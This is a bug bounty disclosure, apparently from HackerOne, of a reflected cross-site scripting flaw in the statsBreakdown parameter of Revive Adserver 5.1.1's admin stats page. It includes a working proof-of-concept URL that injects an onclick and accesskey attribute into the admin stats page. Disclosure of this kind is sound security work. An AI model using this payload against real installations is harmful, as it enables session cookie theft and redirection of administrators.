Revive Adserver: Reflected XSS on /admin/stats.php

Linked to the report https://hackerone.com/reports/1083376
I found a reflected XSS attack on /admin/stats.php.

Revive-Adserver version is revive-adserver-5.1.1.

This time I found the parameter statsBreakdown

• Go to http://revive-adserver.loc/admin/stats.php?statsBreakdown=day%27%20onclick=alert(document.domain)%20accesskey=X%20&listorder=key&orderdirection=up&day=&setPerPage=15&entity=global&breakdown=history&period_preset=last_month&period_start=01+December+2020&period_end=31+December+2020

• For the payload to be executed, the user needs to press the access key combination for the hidden input field (for Firefox, Alt+Shift+X, see this for other browsers).

{F1186275}

Impact

With this vulnerability, an attacker can for example steal users cookies or redirect users on malicious website.